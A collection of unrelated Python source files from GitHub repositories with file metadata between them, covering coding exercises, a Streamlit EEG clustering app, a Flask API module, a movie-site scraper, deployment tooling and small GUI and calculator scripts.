1. the text
2. the redacted words
Returns: array of words in array (1) that are NOT in (2)
1. Instantiate empty array
2. Lowercase contents of array (1) -- maybe later
3. For each word in array (1), IF that word is NOT in array (1), THEN add it to the empty array from STEP #1
4. Once each word from array (2) has been so checked, return the array from STEP #1
"""
|
ckim42/Core-Data-Structures
|
Lessons/source/redact_problem.py
|
redact_problem.py
|
py
| 1,547 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71270407548
|
"""
This question is asked by Apple. Given two binary strings
(strings containing only 1s and 0s) return their sum (also as a binary string).
Note: neither binary string will contain leading 0s unless the string itself is 0
Ex: Given the following binary strings...
"100" + "1", return "101"
"11" + "1", return "100"
"1" + "0", return "1"
"""
from collections import deque
def addBinary(number1:str, number2: str) -> str:
# Time: O(n) -> where "n" is the number of bits of the final sum
# Space: O(n) or O(1) if we don't consider the output
n1Pointer = len(number1)-1
n2Pointer = len(number2)-1
output = deque()
carry = 0
while n1Pointer >= 0 or n2Pointer >= 0:
n1Digit = 0 if n1Pointer < 0 else int(number1[n1Pointer])
n2Digit = 0 if n2Pointer < 0 else int(number2[n2Pointer])
currDigitSum = n1Digit + n2Digit + carry
carry = 1 if currDigitSum >= 2 else 0
if currDigitSum == 2:
currDigitSum = 0
elif currDigitSum == 3:
currDigitSum = 1
output.appendleft(str(currDigitSum)) # O(1)
n1Pointer -= 1
n2Pointer -= 1
if carry:
output.appendleft(str(carry)) # O(1)
return "".join(output) # O(n)
assert addBinary("100", "1") == "101"
assert addBinary("11", "1") == "100"
assert addBinary("1", "0") == "1"
print("Passed all testes!")
|
lucasbivar/coding-interviews
|
the-daily-byte/week_01/day_05_add_binary.py
|
day_05_add_binary.py
|
py
| 1,314 |
python
|
en
|
code
| 0 |
github-code
|
6
|
45641177766
|
import streamlit as st
import pandas as pd
import numpy as np
import umap
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from scipy.cluster.hierarchy import dendrogram, linkage, fcluster
from sklearn.decomposition import PCA
import webbrowser
# Set width mode to wide to display plots better
st.set_page_config(layout="wide")
# Streamlit Configuration
st.set_option('deprecation.showPyplotGlobalUse', False)
# Sidebar
st.sidebar.header("Schizophrenia Data Analysis")
uploaded_file = st.sidebar.file_uploader("Choose a CSV file", type="csv")
# Sliders for UMAP and KMeans parameters
st.sidebar.subheader("UMAP Parameters")
n_neighbors = st.sidebar.slider("Number of Neighbors", 2, 50, 5)
min_dist = st.sidebar.slider("Minimum Distance", 0.0, 1.0, 0.3, 0.1)
st.sidebar.subheader("Clustering Parameters")
n_clusters = st.sidebar.slider("Number of Clusters (KMeans)", 2, 20, 5)
n_dendro_clusters = st.sidebar.slider("Number of Clusters (Dendrogram)", 2, 20, 5)
# Add option to choose linkage method for dendrogram
linkage_methods = ["ward", "single", "complete", "average"]
selected_linkage_method = st.sidebar.selectbox("Linkage Method for Dendrogram", linkage_methods, 0)
# Checkbox to toggle PCA and UMAP visualization
show_pca = st.sidebar.checkbox("Show PCA Visualization", False)
show_umap = st.sidebar.checkbox("Show UMAP Visualization", False)
# Load the data
def load_data(uploaded_file):
data = pd.read_csv(uploaded_file)
return data
# Function to perform UMAP embedding and K-means clustering
def umap_and_kmeans(band_data, n_neighbors=n_neighbors, min_dist=min_dist, n_clusters=n_clusters):
embedding = umap.UMAP(n_neighbors=n_neighbors, min_dist=min_dist, random_state=42).fit_transform(band_data)
kmeans_labels = KMeans(n_init=4, n_clusters=n_clusters, random_state=42).fit(embedding).labels_
return embedding, kmeans_labels
# Function to plot UMAP embedding results
def plot_umap_embedding(embedding, kmeans_labels, ax, title):
ax.scatter(embedding[:, 0], embedding[:, 1], c=kmeans_labels, cmap='rainbow', s=20)
# add a text with umap parameters and kmeans cluster number
ax.text(0.99, 0.01, f"n_neighbors={n_neighbors}, min_dist={min_dist}, n_clusters={n_clusters}",
transform=ax.transAxes, ha='right', va='bottom', size=10)
ax.set_title(title)
def plot_dendrogram_colored_ticks(band_data, ax, title, method='ward'):
"""
Plot the dendrogram with correctly colored tick numbers for the "All Subjects" group.
"""
# Hierarchical clustering
Z = linkage(band_data, method=method)
# Plot the dendrogram
ddata = dendrogram(Z, ax=ax, leaf_rotation=90)
ax.set_title(title + " Dendrogram (" + method + " linkage)")
ax.set_xlabel("Sample Index")
ax.set_ylabel("Distance")
# Color the tick numbers based on control and schizophrenia subjects
control_indices = data_control.index.to_list()
schizophrenia_indices = data_schizophrenia.index.to_list()
# Get the x-tick labels (leaf labels) from the dendrogram
leaf_labels = ddata['leaves']
# Iterate through x-ticks and color them based on the group
for idx, label in enumerate(ax.get_xticklabels()):
label_idx = leaf_labels[idx]
if label_idx in control_indices:
label.set_color('black')
elif label_idx in schizophrenia_indices:
label.set_color('red')
def plot_dendrogram_and_pca_with_correct_colored_ticks(band_data, ax_dendro, title, color_ticks=False, method='ward'):
"""
Plot the dendrogram with optionally colored tick numbers and PCA visualization on the given axes.
"""
# Hierarchical clustering
Z = linkage(band_data, method=method)
# Plot the dendrogram
ddata = dendrogram(Z, ax=ax_dendro, leaf_rotation=90)
ax.set_title(str(title) + " Dendrogram (" + str(method) + " linkage)")
ax_dendro.set_xlabel("Sample Index")
ax_dendro.set_ylabel("Distance")
if color_ticks:
# Color the tick numbers based on control and schizophrenia subjects
control_indices = data_control.index.to_list()
schizophrenia_indices = data_schizophrenia.index.to_list()
# Get the x-tick labels (leaf labels) from the dendrogram
leaf_labels = ddata['leaves']
# Iterate through x-ticks and color them based on the group
for idx, label in enumerate(ax_dendro.get_xticklabels()):
label_idx = leaf_labels[idx]
if label_idx in control_indices:
label.set_color('black')
elif label_idx in schizophrenia_indices:
label.set_color('red')
return Z
def plot_band_pca(band_data, Z, ax_pca, title):
# Cut the dendrogram to obtain 3 clusters
labels = fcluster(Z, t=n_dendro_clusters, criterion='maxclust')
band_data['Cluster'] = labels
# Use PCA to reduce the data to 2D
pca = PCA(n_components=2)
band_pca = pca.fit_transform(band_data.drop('Cluster', axis=1))
# return band_pca
# Create a scatter plot for PCA reduced data
ax_pca.scatter(band_pca[:, 0], band_pca[:, 1], c=band_data['Cluster'], cmap='rainbow')
ax_pca.set_title(title + " 2D PCA")
ax_pca.set_xlabel("Principal Component 1")
ax_pca.set_ylabel("Principal Component 2")
# If a CSV file is uploaded
if uploaded_file:
st.write("Dataset loaded successfully!")
# Load the data
data = load_data(uploaded_file)
# Split data into control and schizophrenia groups
data_control = data[data['Group'] == 0]
data_schizophrenia = data[data['Group'] == 1]
data_full = data
# Combined dendrogram for "All Subjects"
all_bands_data = pd.concat([
data.loc[:, data.columns.str.startswith('avpp_delta')],
data.loc[:, data.columns.str.startswith('avpp_theta')],
data.loc[:, data.columns.str.startswith('avpp_alpha')],
data.loc[:, data.columns.str.startswith('avpp_beta')],
data.loc[:, data.columns.str.startswith('avpp_gamma')]
], axis=1)
fig, ax = plt.subplots(figsize=(16, 8))
plot_dendrogram_colored_ticks(all_bands_data, ax, "All Bands Combined", method=selected_linkage_method)
plt.tight_layout()
# Save the dendrogram plot to a PNG file
dendrogram_filename = "Combined_Dendrogram_plot.png"
fig.savefig(dendrogram_filename, dpi=300)
# Provide a download button for the dendrogram PNG file
with open(dendrogram_filename, "rb") as f:
btn = st.download_button(
label="Download Combined Dendrogram Plot",
data=f,
file_name=dendrogram_filename,
mime="image/png"
)
st.pyplot(fig)
st.write("EDA - Exploratory Data Analysis")
# Detect available bands from column names
bands_list = ['delta', 'theta', 'alpha', 'beta', 'gamma']
available_bands = [band for band in bands_list if any(data.columns.str.startswith(f'avpp_{band}'))]
# Note: Replace all `plt.show()` with `st.pyplot()`
# Create the plots with dendrogram, PCA, and UMAP visualizations
nrows = 3 if show_pca and show_umap else 2 if show_pca or show_umap else 1 # Number of rows in the plot
hight = 15 if show_pca and show_umap else 10 if show_pca or show_umap else 5 # Height of the plot
for data_group, title in zip([data_schizophrenia, data_control, data_full], ["Schizophrenia", "Control", "All Subjects"]):
fig, axes = plt.subplots(nrows=nrows, ncols=len(available_bands), figsize=(36, hight))
fig.suptitle(title, fontsize=25)
# Ensure axes is 2D
if nrows == 1:
axes = axes.reshape(1, -1)
# Create band data based on detected bands for the current data group
bands = [(band.capitalize(), data_group.loc[:, data_group.columns.str.startswith(f'avpp_{band}')]) for band in available_bands]
# Configure the axes based on the selected visualizations
axes_mapping = [0] # dendrogram axes index is always 0
if show_pca:
axes_mapping.append(len(axes_mapping))
if show_umap:
axes_mapping.append(len(axes_mapping))
# Plot dendrogram, PCA, and UMAP visualizations for each band
for col, (band_name, band_data) in enumerate(bands):
ax_dendro = axes[axes_mapping[0]][col]
ax_dendro.set_title(band_name)
color_ticks = True if title == "All Subjects" else False
# Dendrogram plots using previous functions
Z = plot_dendrogram_and_pca_with_correct_colored_ticks(band_data.copy(), ax_dendro, band_name, color_ticks, method=selected_linkage_method)
if show_pca:
ax_pca = axes[axes_mapping[1]][col]
plot_band_pca(band_data.copy(), Z, ax_pca, title)
if show_umap:
ax_umap = axes[axes_mapping[-1]][col]
embedding, kmeans_labels = umap_and_kmeans(band_data)
plot_umap_embedding(embedding, kmeans_labels, ax_umap, band_name + " 2D UMAP")
plt.tight_layout()
plt.subplots_adjust(top=0.85)
# Save the plot to a PNG file
plot_filename = f"{title.replace(' ', '_')}_plot.png"
fig.savefig(plot_filename, dpi=600)
# plt.show()
# st.pyplot()
# st.image(plot_filename, use_column_width=True, clamp=True)
st.pyplot(fig)
plt.close(fig)
# Provide a download button for the PNG file
with open(plot_filename, "rb") as f:
btn = st.download_button(
label=f"Download {title} Plot",
data=f,
file_name=plot_filename,
mime="image/png"
)
|
furmanlukasz/clusteringSchizphrenia
|
app.py
|
app.py
|
py
| 9,731 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25570985502
|
from View.View import *
from Calculator.Types.Rational import Rational
from Calculator.Types.Complex import Complex
def Start():
while True:
type_choice = input(f"{choice_type_values} > ")
if type_choice == "1":
num1 = Rational("Первое число")
num2 = Rational("Второе число")
elif type_choice == "2":
num1 = Complex("Первое число")
num2 = Complex("Второе число")
else:
return 0
type_operation = input(f"{choice_operation} > ")
if type_operation == "1":
num1.summarize(num2)
elif type_operation == "2":
num1.subtraction(num2)
elif type_operation == "3":
num1.multiplication(num2)
elif type_operation == "4":
num1.division(num2)
elif type_operation == "5":
continue
else:
"Неверное значение. Программа прекращает работать"
return 0
show_result(num1)
|
kdmitry0688/JAVA_OOP
|
HW7/Control.py
|
Control.py
|
py
| 1,114 |
python
|
en
|
code
| 0 |
github-code
|
6
|
12731744615
|
#!/usr/bin/env python3
# create a GUI in Python
from tkinter import *
'''class App(tk.Frame):
def __init__(self,master=None):
super().__init__(master)
self.master=master
self.pack()
self.create_widgets()
def create_widgets(self):
'''
#create root window
root =Tk()
#dimensions
root.title("GUI test")
root.geometry('400x300')
#widgets
#menu-bar
myMenu=Menu(root)
root.config(menu=myMenu)
fileMenu=Menu(myMenu)
myMenu.add_cascade(label='File',menu=fileMenu)
fileMenu.add_command(label='New')
fileMenu.add_command(label='Open...')
fileMenu.add_separator()
fileMenu.add_command(label='Exit',command=root.quit)
helpMenu=Menu(myMenu)
myMenu.add_cascade(label='Help',menu=helpMenu)
helpMenu.add_command(label='About')
#add a label to root window
Label(root,text='First Name').grid(row=0)
Label(root,text='Last Name').grid(row=1)
entry1=Entry(root)
entry2=Entry(root)
entry1.grid(column=1,row=0)
entry2.grid(column=1,row=1)
lbl=Label(root,text="Are you in?")
lbl.grid(column=0,row=2)
Label(root,text='Languages').grid(row=3)
Label(root,text='OS').grid(row=4)
#list
listBox=Listbox(root)
listBox.grid(column=1,row=3)
myList=["C++","Python","JavaScript","sed/AWK","Ruby"]
for zz in range(len(myList)):
#print(zz+1,myList[zz])
listBox.insert(zz+1,myList[zz])
#radiobutton
v=IntVar()
Radiobutton(root, text='Debian 10', variable=v, value=1).grid(column=1,row=4)
Radiobutton(root, text='Windows 10', variable=v, value=2).grid(column=2,row=4)
#function to display text when a button is clicked
def click_me():
res="You wrote: "+txt.get()
lbl.configure(text = res)
#button widget
btn=Button(root,text="Click me",fg="red",command=click_me)
btn.grid(column=2,row=2) #position on window
#adding entry field
txt=Entry(root,width=10)
txt.grid(column=1,row=2)
root.mainloop()
|
ndlopez/learn_python
|
learn_tk/tk_gui.py
|
tk_gui.py
|
py
| 1,832 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27535780328
|
import time
from functools import wraps
from typing import Dict
import requests
from constants import GITHUB_ROOT, RENDER_ROOT
from logging_config import logger
from render_api.utils import get_headers, get_github_status
session = requests.Session()
# Decorator for logging and error handling
def log_and_handle_errors(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as exc:
logger.error(f"Exception in {func.__name__}| {exc}")
return None
return wrapper
@log_and_handle_errors
def manage_deployment_status(data: Dict):
pr = data["pull_request"]
repo_data = data["repository"]
state, merged = pr["state"], pr["merged"]
user_repo, repo_url = repo_data["full_name"], repo_data["html_url"]
owner, repo = repo_data["owner"]["login"], repo_data["name"]
if not (merged and state == "closed"):
return
service_id = get_render_service_id(repo_url)
if not service_id:
logger.error("Render service ID is null")
return
deployment_status = get_render_deployment_status(service_id)
if not deployment_status:
return
process_deployment_status(user_repo, repo, owner, deployment_status, service_id)
@log_and_handle_errors
def process_deployment_status(user_repo, repo, owner, deployment_status, service_id):
github_status = get_github_status(deployment_status["status"])
deployment_id = deployment_status["id"]
github_deployment_id = create_github_deployment(user_repo, repo, owner)
if not github_deployment_id:
logger.error("Failed to create GitHub deployment")
return
update_github_deployment_status(
owner, repo, github_status, deployment_id, user_repo, github_deployment_id, service_id
)
@log_and_handle_errors
def update_github_deployment_status(
owner, repo, status, deployment_id, user_repo, github_deployment_id, service_id
):
create_github_deployment_status(
owner, repo, status, deployment_id, user_repo, github_deployment_id
)
new_status = ""
while new_status not in ["failure", "success"]:
new_render_deployment_status = get_render_deployment_status(service_id)
new_status = get_github_status(new_render_deployment_status["status"])
time.sleep(
10
) # You can remove it (but it's better to not spam the render API [400 GET request/minutes])
create_github_deployment_status(
owner, repo, new_status, deployment_id, user_repo, github_deployment_id
)
@log_and_handle_errors
def get_render_deployment_status(service_id: str) -> Dict:
url = f"{RENDER_ROOT}/services/{service_id}/deploys"
response = session.get(url, headers=get_headers("render"))
logger.info(f"GET: {url} executed with status_code: {response.status_code}")
data = response.json()[0]["deploy"]
return {"status": data["status"], "id": data["id"]}
@log_and_handle_errors
def get_render_service_id(repo: str) -> str:
url = f"{RENDER_ROOT}/services"
response = session.get(url, headers=get_headers("render"))
logger.info(f"GET: {url} executed with status_code: {response.status_code}")
for service in response.json():
if service["service"]["repo"] == repo:
return service["service"]["id"]
@log_and_handle_errors
def create_github_deployment(user_repo: str, repo: str, owner: str) -> str:
url = f"{GITHUB_ROOT}/repos/{user_repo}/deployments"
data = {
"owner": owner,
"repo": repo,
"ref": "main",
"environment": "Production",
"production_environment": True,
"description": "Deployment status from Render",
}
response = session.post(url, headers=get_headers("github"), json=data)
logger.info(f"POST: {url} executed with status_code: {response.status_code}")
return response.json().get("id")
@log_and_handle_errors
def create_github_deployment_status(
owner: str,
repo: str,
status: str,
render_deployment_id: str,
user_repo: str,
github_deployment_id: str,
):
url = f"{GITHUB_ROOT}/repos/{user_repo}/deployments/{github_deployment_id}/statuses"
data = {
"owner": owner,
"repo": repo,
"state": status,
"deployment_id": render_deployment_id,
"environment": "Production",
"description": "Deployment status from Render",
}
response = session.post(url, headers=get_headers("github"), json=data)
logger.info(f"POST: {url} executed with status_code: {response.status_code}")
|
Fyleek/render-api
|
render_api/services/deployment_status_service.py
|
deployment_status_service.py
|
py
| 4,593 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73574084347
|
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "Deuces Poker Client",
version = "1.0",
author = "Daniel Fonseca Yarochewsky",
description = ("A client to simulate a Texa Holdem Poker Table"),
license = "Free",
packages=['deuces-master', 'termcolor'],
long_description=read('README')
)
|
yarochewsky/poker-client
|
setup.py
|
setup.py
|
py
| 409 |
python
|
en
|
code
| 1 |
github-code
|
6
|
23609310998
|
import selenium
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
from bs4 import BeautifulSoup
import pymysql
from db_setting import db
# 페이지 로딩을 기다리는데 사용할 time 모듈 import
import time
# 브라우저 꺼짐 방지 옵션
chrome_options = Options()
chrome_options.add_experimental_option("detach", True)
# URL of the theater page
CGV_URL = 'http://www.cgv.co.kr/movies/?lt=1&ft=1'
driver = webdriver.Chrome(options=chrome_options)
driver.delete_all_cookies()
driver.get(url=CGV_URL)
# 페이지가 완전히 로딩되도록 1초동안 기다림
time.sleep(0.3)
# 더보기 버튼이 있는지 확인
btn_mores = driver.find_elements(By.CLASS_NAME, 'btn-more-fontbold')
if btn_mores:
for btn in btn_mores:
btn.click()
time.sleep(0.3)
# 영화 클릭
box_elements = driver.find_elements(By.CLASS_NAME, 'box-image')
href_list = []
for element in box_elements:
href_list.append(element.find_element(By.TAG_NAME, 'a').get_attribute('href'))
links = []
for href in href_list:
driver.get(href)
try:
director_dt = driver.find_element(By.XPATH, "//dt[contains(., '감독')]")
director_as = director_dt.find_elements(By.XPATH, "./following-sibling::dd[1]/a")
for director_a in director_as:
new_link = director_a.get_attribute("href")
if new_link not in links:
links.append(new_link)
actor_dt = driver.find_element(By.XPATH, "//dt[contains(., '배우')]")
actor_as = actor_dt.find_elements(By.XPATH, "./following-sibling::dd[1]/a")
for actor_a in actor_as:
new_link = actor_a.get_attribute("href")
if new_link not in links:
links.append(new_link)
except NoSuchElementException:
print("정보 없음")
time.sleep(0.1)
names = []
births = []
nations = []
for link in links:
driver.get(link)
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
# 이름
name_tag = soup.find(class_='title').find('strong').get_text(strip=True)
names.append(name_tag)
# 출생, 국적 한번에 가져오기
tags = soup.find(class_='spec').find('dl')
# 출생
birth_tag_sibling = tags.find('dt', text= lambda text: text and '출생' in text)
if birth_tag_sibling:
birth_tag = birth_tag_sibling.find_next_sibling().get_text(strip=True)
else :
birth_tag = ""
births.append(birth_tag)
# 국적
nation_tag_sibling = tags.find('dt', text= lambda text: text and '국적' in text)
if nation_tag_sibling:
nation_tag = nation_tag_sibling.find_next_sibling().get_text(strip=True)
else :
nation_tag = ""
nations.append(nation_tag)
print("name : ", name_tag)
print("birth : ", birth_tag)
print("nation : ", nation_tag)
print("================================")
conn = pymysql.connect(host=db['host'], port=db['port'], user=db['user'], password=db['password'], db=db['db'], charset=db['charset'])
curs = conn.cursor(pymysql.cursors.DictCursor)
for name, birth, nation in zip(names, births, nations):
sql = "INSERT INTO person (name, birth, nation) VALUES (%s, %s, %s)"
val = (name, birth, nation)
curs.execute(sql, val)
conn.commit()
conn.close()
|
Ticket-Cinema/real-time-crawling
|
first_chart_crawling/actor_crawling.py
|
actor_crawling.py
|
py
| 3,333 |
python
|
en
|
code
| 0 |
github-code
|
6
|
29818611165
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @File : get_content_data.py
# @Description: 获取去标签后的文本数据
# @Time : 2020-5-30 上午 11:09
# @Author : Hou
import os
import pandas as pd
import pymysql.cursors
def get_id_list():
original_data = pd.read_excel(os.path.join(os.path.abspath('../..'), 'data', 'raw', 'filtered_data.xlsx'))
id_series = original_data['id']
id_list = id_series.to_numpy()
return id_list
def get_content_data(id_list):
"""获取去标签后的文本数据"""
connection = pymysql.connect(host='58.59.18.101',
port=3306,
user='data',
password='data12399123',
database='bidding_data',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
content_df = pd.DataFrame(columns=('bulletin_id', 'content', 'partition_key'))
try:
with connection.cursor() as cursor:
sql = "SELECT * FROM `bidding_bulletin_text` where bulletin_id= %s"
# 获取2000条数据进行测试
for index in range(2001):
cursor.execute(sql, (id_list[index],))
result = cursor.fetchone()
# print(result)
content_df.loc[index] = result
finally:
connection.close()
return content_df
if __name__ == '__main__':
id_list = get_id_list()
content_df = get_content_data(id_list)
content_df.to_excel(os.path.join(os.path.abspath('../..'), 'data', 'processed', 'content_text_data.xlsx'))
|
Kidron-Hou/category_division
|
src/data/get_content_data.py
|
get_content_data.py
|
py
| 1,684 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3929047732
|
from .wav import write_sine_wave_wav_file
def test_sine():
import io
import time
buffer_size = io.DEFAULT_BUFFER_SIZE
filename = "test-5min-512hz-sr48khz-s24le-pcmdatagen.wav"
frequency = 512
sample_rate = 48000
duration = 5 * 60 * sample_rate # 5 minutes
bit_depth = 24
start_time = time.time()
with open(filename, "wb") as fp:
write_sine_wave_wav_file(
fp=fp,
frequency=frequency,
buffer_size=buffer_size,
sample_rate=sample_rate,
num_samples=duration,
bits_per_sample=bit_depth,
)
end_time = time.time()
print(f"Time taken: {end_time - start_time}")
def main():
return test_sine()
if __name__ == "__main__":
main()
|
louie-github/morsel
|
morsel/test_sine.py
|
test_sine.py
|
py
| 772 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14489406692
|
#1)
import numpy as np
def polyfit_file(file, d):
data = np.loadtxt(file, float)
x = data[:,0]
y = data[:,1]
return np.polyfit(x, y, d)
#2)
import numpy as np
import random as rd
def flip_coin(N):
h=0.0
t=0.0
while h+t<N:
x=rd.randint(1,2)
if x==1:
h+=1
else:
t+=1
if N>10**6:
return None
else:
return h
#3)
import numpy as np
import random as rd
def rolling_dice(n, v):
attempt=0.0
doubles=0.0
while attempt<n:
x=rd.randint(1,6)
y=rd.randint(1,6)
attempt+=1
if x==y==v:
doubles+=1
if n<=10**6.0:
return doubles
else:
return None
def test_throw(n, v):
if 1<=v<=6 and n<10**6.0:
prob=rolling_dice(n, v)/n
return prob
else:
return None
#4)
import numpy as np
import random as rd
def MCint_pi(N):
M=0.0
attempt=0.0
while attempt<N:
x=rd.uniform(-1.0, 1.0)
y=rd.uniform(-1.0, 1.0)
attempt+=1.0
if (x**2.0+y**2.0)**(1.0/2.0)<=1:
M+=1.0
result=2*2*M/N
return result
|
cameronfantham/PX150-Physics-Programming-Workshop
|
Task 4.py
|
Task 4.py
|
py
| 1,142 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7784070706
|
"""MYAPP Core application logic."""
from json import (
JSONDecoder,
JSONEncoder,
loads as _json_loads,
)
from logging import getLogger
from pathlib import PosixPath
from http import HTTPStatus
from flask import Blueprint, current_app, request, Response
from flask.views import MethodView
from webargs.flaskparser import FlaskParser
from marshmallow import Schema, fields, pre_dump, RAISE, EXCLUDE
__all__ = [
'APP_PATH',
'APIMethodView',
'APIBlueprint',
'APIError',
'APIRequestSchema',
'APIResponseSchema',
'APIMetadataSchema',
'JSONEncoder',
'JSONDecoder',
'json_dump',
'json_dumps',
'json_loads',
'parse',
'log_request',
'log_response',
]
LOG = getLogger(__name__)
# ----------------------------------CONSTANTS----------------------------------
APP_PATH = PosixPath(__file__).parent
# ----------------------------------CONSTANTS----------------------------------
# -------------------------------WEBARGS SETTINGS-------------------------------
class APIRequestParser(FlaskParser):
def handle_error(self, error, req, schema, *, error_status_code, error_headers):
raise APIError(
'The request specification is invalid; check OpenAPI docs for more info.',
metadata={'errors': error.messages},
http_status=error_status_code or HTTPStatus.OK,
)
def parse_files(self, req, name, field):
raise NotImplementedError
parser = APIRequestParser()
parse = parser.use_args
# -------------------------------WEBARGS SETTINGS-------------------------------
# --------------------------------SERIALIZATION--------------------------------
class APIRequestSchema(Schema):
"""MYAPP base request schema."""
class Meta:
"""Raise on unknown parameters."""
unknown = RAISE
class APICommonRequestSchema(Schema):
"""MYAPP common request parameters."""
class Meta:
"""Do not react on unknown parameters."""
unknown = EXCLUDE
debug_tb_enabled = fields.Boolean(
required=False,
default=False,
)
class APIResponseSchema(Schema):
"""MYAPP base response schema."""
class Meta:
"""Exclude any unknown parameters."""
unknown = EXCLUDE
data = fields.Dict(
required=True,
default=dict,
)
metadata = fields.Nested(
'APIMetadataSchema',
required=True,
)
@classmethod
def default_metadata(cls):
"""
Create default metadata.
:return: metadata fallback
"""
return {
'status': 0,
'message': 'Nice',
'headers': {},
'errors': None,
'details': None,
}
@pre_dump
def pre_dump(self, response, many=None):
"""
Make pre dump handling.
:param response: raw response
:param many: is many
:return: enriched raw response
"""
_ = many
metadata = self.default_metadata()
response_metadata = response.get('metadata', {})
for field in 'status', 'message', 'headers', 'errors', 'details':
if field in response_metadata:
metadata[field] = response_metadata[field]
# FIXME: dynamic messages
if metadata['status'] and metadata['message'] == 'Nice':
metadata['message'] = 'Not nice'
response['metadata'] = metadata
return response
class APIMetadataSchema(Schema):
"""MYAPP Metadata schema."""
status = fields.Integer(
required=True,
default=0,
)
message = fields.String(
required=True,
default='Nice',
)
headers = fields.Dict(
required=True,
default=dict,
)
errors = fields.Dict(
required=True,
allow_none=True,
default=None,
)
details = fields.Dict(
required=True,
allow_none=True,
default=None,
)
# --------------------------------SERIALIZATION--------------------------------
# ------------------------FLASK AND APPLICATION GENERICS------------------------
class APIJSONEncoder(JSONEncoder):
"""MYAPP JSON Encoder."""
def __init__(
self,
*,
skipkeys=False,
check_circular=True,
allow_nan=True,
separators=None,
default=None,
):
"""
Initialize encoder.
:param skipkeys: is skip
:param check_circular: is check circular
:param allow_nan: is allow nan
:param separators: separator char
:param default: default value
"""
ensure_ascii = current_app.config['JSON_ENSURE_ASCII']
sort_keys = current_app.config['JSON_SORT_KEYS']
indent = current_app.config['JSON_INDENT']
super().__init__(
skipkeys=skipkeys,
ensure_ascii=ensure_ascii,
check_circular=check_circular,
allow_nan=allow_nan,
sort_keys=sort_keys,
indent=indent,
separators=separators,
default=default,
)
class APIJSONDecoder(JSONDecoder):
"""MYAPP JSON Decoder."""
def json_dumps(obj, **kwargs):
"""
MYAPP json dumps.
:param obj: object
:param kwargs: any
:return: json string
"""
return APIJSONEncoder(**kwargs).encode(obj)
def json_dump(obj, file, **kwargs):
"""
MYAPP json dump.
:param obj: python object
:param file: filename
:param kwargs: any
"""
for chunk in APIJSONEncoder(**kwargs).iterencode(obj):
file.write(chunk)
def json_loads(string, **kwargs):
"""
MYAPP json loads.
:param string: json string
:param kwargs: any
:return: dict
"""
return _json_loads(string, cls=APIJSONDecoder, **kwargs)
class APIMethodView(MethodView):
"""API Method View."""
decorators = (
parse(APICommonRequestSchema(), location='query'),
)
class APIBlueprint(Blueprint):
"""API Blueprint."""
def log_request():
"""Log request in curl-based fashion."""
msg = fr"curl -w '\n' -iX {request.method} '{request.url}' "
msg += ''.join(f"-H '{h}:{v}' " for h, v in request.headers.items())
if (
request.method in {'POST', 'PUT', 'PATCH'}
and request.headers.get('Content-Type') == 'application/json'
):
msg += f"-d '{request.data.decode('utf8')}'"
LOG.info(msg)
def log_response(response: Response):
"""
Log response json.
:param response: flask response
:return: flask response
"""
if response.is_json:
LOG.info(f'Response: {response.json}')
return response
# ------------------------FLASK AND APPLICATION GENERICS------------------------
# ---------------------------EXCEPTIONS AND MESSAGES---------------------------
class APIError(Exception):
"""Base API Exception."""
def __init__(self, *args, **kwargs):
"""
Initialize API exception.
:param args: any
:param kwargs: any
"""
schema = kwargs.pop('schema', APIResponseSchema())
data = kwargs.pop('data', {})
metadata = kwargs.pop('metadata', {})
metadata.setdefault('message', 'Error' if not args else args[0])
metadata.setdefault('status', 3)
self.json = schema.dump({'data': data, 'metadata': metadata})
self.http_status = kwargs.pop('http_status', HTTPStatus.OK)
super().__init__(*args)
# ---------------------------EXCEPTIONS AND MESSAGES---------------------------
|
jjj4x/flask_api_example
|
src/myapp/core.py
|
core.py
|
py
| 7,547 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35614869771
|
"""
This will fetch database data from database
"""
from typing import List
from copy import deepcopy
from codegen.table.python_free_connex_table import PythonFreeConnexTable
from codegen.database import DatabaseDriver
from os import path
class DataFetcher:
def __init__(self, db_driver: DatabaseDriver):
"""
Construct a db fetcher instance. It requires to have a db driver input,
in order to fetch different files
:param db_driver: A db_driver, can be postgres_db_driver
"""
self.db_driver = db_driver
def store_data(self, output_dir: str, tables: List[PythonFreeConnexTable], should_write=True) -> List[
PythonFreeConnexTable]:
"""
Perform a select on all tables and stored output data into the [output_dir].
Will also return a new list of tables which has the dat_path and data_size set.
:type should_write: object
:param output_dir: Output dir
:param tables: List of tables
:return:
"""
new_tables = deepcopy(tables)
for i, table in enumerate(tables):
if len(table.annotations) > 0:
annotations = ""
for index, annotation in enumerate(table.annotations):
annotations += f"{annotation} as {table.get_annotation_name(index)}"
if index < len(table.annotations) - 1:
annotations += ","
sql = f"select *, {annotations} from {table._table_name};"
else:
sql = f"select * from {table._table_name};"
output_path = path.join(output_dir, table.variable_table_name) + '.tbl'
size = 0
if should_write:
size = self.db_driver.execute_save(sql=sql, output_filename=output_path)
new_tables[i].data_paths = [output_path]
new_tables[i].data_sizes = [size]
return new_tables
|
secyan/secyan_gen
|
codegen/utils/DataFetcher.py
|
DataFetcher.py
|
py
| 1,945 |
python
|
en
|
code
| 2 |
github-code
|
6
|
29446328549
|
# -*- coding: utf-8 -*-
import sys
import cv2
import mediapipe as mp
import re
import time
import threading
from PySide2 import QtCore, QtGui, QtWidgets
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from selenium import webdriver
from lib.handsign.gesture import define_gesture, find_gesture, handedness
from lib.sr.SR_edsr import sr_work
from socket import *
## ==> SPLASH SCREEN
from lib.ui.ui_splash_screen import Ui_SplashScreen
## ==> MAIN WINDOW
from lib.ui.ui_main import Ui_MainWindow
# Create Socket
clientSock = socket(AF_INET, SOCK_STREAM)
url = '192.168.43.145'
